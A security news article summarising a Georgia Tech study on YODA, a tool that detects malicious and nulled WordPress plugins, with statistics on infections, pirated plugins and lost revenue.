A total of 47,337 malicious plugins were discovered on 24,931 different websites, with 3,685 of them being sold on legitimate markets, netting the attackers $41,500 in unlawful profits.
According to an 8-year study undertaken by a group of academics from the Georgia Institute of Technology, the findings come from a new tool called YODA, which tries to detect rogue WordPress plugins and track down their origin.
In a recent article titled “Mistrust Plugins You Must,” the researchers revealed that attackers impersonated benign plugin providers and distributed malware by distributing pirated plugins.
“Malicious activity peaked in March 2020, with the number of malicious plugins on websites continuously increasing over time. Surprisingly, 94 percent of the malicious plugins that were installed during that time period are still active “today,” she says.
The large-scale study looked at WordPress plugins installed on 410,122 different web servers dating back to 2012, and discovered that plugins costing a total of $834,000 were infected by threat actors after they were deployed.
YODA can be directly incorporated into a website and hosted by a web server hosting provider, or it can be distributed through a plugin marketplace. The framework may be used to identify a plugin’s provenance and ownership in addition to detecting hidden and malware-rigged add-ons.
It accomplishes this by detecting plugins by analyzing server-side code files and accompanying metadata (e.g., comments), then performs a syntactic and semantic analysis to indicate dangerous activity.
Web shells, function to insert new articles, password-protected execution of injected code, spam, code obfuscation, blackout SEO, malware downloaders, malvertising, and cryptocurrency miners are all covered by the semantic model.
The following are some more important findings:
- Spam injection was made possible via 3,452 plugins accessible on authorized plugin markets.
- Post-deployment, 40,533 plugins were infected across 18,034 websites.
- Nulled plugins, which are WordPress plugins or themes that have been altered with to download harmful code onto servers, accounted for 8,525 of the total malicious add-ons, with around 75% of the pirated plugins defrauding creators of $228,000 in income.
“By using YODA, website owners and hosting providers may detect dangerous plugins on the web server,” the researchers explained. “Plugin developers and marketplaces can vet their plugins before distribution.”
